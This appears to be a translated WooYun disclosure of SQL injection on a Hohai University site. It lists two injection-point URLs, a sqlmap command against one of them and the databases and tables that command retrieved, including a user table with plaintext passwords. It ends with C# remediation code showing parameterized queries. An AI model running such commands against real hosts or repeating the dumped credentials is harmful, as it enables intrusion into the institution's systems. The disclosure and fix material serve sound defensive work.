
Vulnerability summary

Defect ID: wooyun-2015-0109083

Title: A SQL injection at Hohai University (河海大学)

Vendor: Hohai University (河海大学)

Author: 路人甲

Submitted: 2015-04-24 12:47

Fix deadline: 2015-04-29 12:48

Published: 2015-04-29 12:48

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 13

Status: Handed over to a third-party partner (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-24: Details sent to the vendor; awaiting the vendor's handling
2015-04-29: The vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

I checked, and there is only one report for this vendor on WooYun, and it is one of the 666 submitted by 老和尚. The injection point is different, so can this one pass? The protection was probably never finished.

Detailed description:

Injection points. First: http://sljzw.hhu.edu.cn/fen/cata.aspx?type=75
Second: http://sljzw.hhu.edu.cn/fen/showmore.aspx?newstype=2
C:\Users\Administrator>sqlmap.py -u http://sljzw.hhu.edu.cn/fen/cata.aspx?type=75 --dbs
available databases [24]:
[*] ChengGuo
[*] HH_Course
[*] HH_Course_2010
[*] HH_lw
[*] HH_StarOfWater
[*] HH_Teachers
[*] HHDX_DiaoCha
[*] HHDX_DiaoCha_OLD
[*] innovation
[*] lunwen
[*] lunwenII
[*] lunwenIIold
[*] lwtest
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] shuili
[*] suili
[*] tempdb
[*] TeSeZhuanYe
[*] TMJSFG
[*] XFRD
Database: HH_Course
[12 tables]
+----------------+
| T_Answer |
| T_News |
| T_Question |
| T_Type |
| T_User |
| T_XueYuan |
| T_ZhuanYe |
| V_Answer |
| V_Question |
| dtproperties |
| sysconstraints |
| syssegments |
+----------------+
Database: HH_Course
Table: T_User
[3 entries]
+--------+----+-----+-----------+----------+-----------------------+------------------+
| UserId | No | Pwd | Role | UserName | UserFile | FileTheme |
+--------+----+-----+-----------+----------+-----------------------+------------------+
| Admin | 1 | 1 | Admin | ??攷?晤??塔 | ImagesData/Admin/2170 | ImagesData/Admin |
| 11 | 2 | 11 | Principal | 11 | NULL | NULL |
| 22 | 3 | 22 | Principal | 22 | NULL | NULL |
+--------+----+-----+-----------+----------+-----------------------+------------------+
Database: HH_Teachers
[48 tables]
+---------------------------+
| T_Answer |
| T_BMXiangMu |
| T_BaoMing |
| T_CiShu |
| T_DDPJ |
| T_Email |
| T_GQSJ |
| T_HDBM |
| T_JXLiNian |
| T_JXZiLiao |
| T_News |
| T_Question |
| T_SelTeachingConsultation |
| T_SelXiangMu |
| T_StudentPJ |
| T_TCType |
| T_THPJ |
| T_TeachingConsultation |
| T_Type |
| T_User |
| T_XMBM |
| T_XueYuan |
| T_ZHKaoHe |
| T_ZhuanYe |
| T_ZhuanYes |
| V_001 |
| V_Answer |
| V_JLHD |
| V_Question |
| V_TeachingConsultation |
| dtproperties |
| sysconstraints |
| syssegments |
| t_DAnswer |
| t_DOption |
| t_DiaoCha |
| t_DiaoChaTM |
| t_Dtimu |
| t_HDAnswer |
| t_HDQuestion |
| t_JSKHJG |
| t_JSPingJia |
| t_JXHuoDong |
| t_JsTypeQiShu |
| t_QiShu |
| t_TeacherInfo |
| t_XueQi |
| t_keCheng |
+---------------------------+

Proof of vulnerability:

As above.

Remediation:

Filter the input.
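The two injection points above take a numeric query-string parameter (`type`, `newstype`) on ASP.NET pages backed by SQL Server. The example below is added here and is not the site's code: it shows the concatenation pattern that produces this class of bug next to the parameterized form that the "filter" advice amounts to in practice. The table and column names (`T_News`, `TypeId`, `Id`, `Title`) are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not the site's code. Table and column names are assumptions.
public static class CatalogQuery
{
    // Vulnerable pattern: the raw query-string value (e.g. Request.QueryString["type"])
    // is spliced into the SQL text, so whatever follows the number becomes part of
    // the statement SQL Server executes. This is what sqlmap finds on cata.aspx?type=.
    public static SqlCommand BuildVulnerable(SqlConnection conn, string typeParam)
    {
        return new SqlCommand(
            "SELECT Id, Title FROM T_News WHERE TypeId = " + typeParam, conn);
    }

    // Hardened pattern: first check that the value really is an integer, then bind
    // it as a typed parameter. The SQL text is now constant and user input can only
    // ever be a number in the TypeId comparison.
    public static SqlCommand BuildSafe(SqlConnection conn, string typeParam)
    {
        if (!int.TryParse(typeParam, out int typeId) || typeId < 0)
            throw new ArgumentException("type must be a non-negative integer");

        var cmd = new SqlCommand(
            "SELECT Id, Title FROM T_News WHERE TypeId = @typeId", conn);
        cmd.Parameters.Add("@typeId", SqlDbType.Int).Value = typeId;
        return cmd;
    }
}
```

The same change applies to `showmore.aspx?newstype=`; rejecting non-integer input early also gives a cheap detection signal, since legitimate traffic never sends anything but a number in these parameters.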

Copyright notice: when reposting, credit the source 路人甲@乌云


Vendor response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2015-04-29 12:48

Vendor reply:

Latest status:

None yet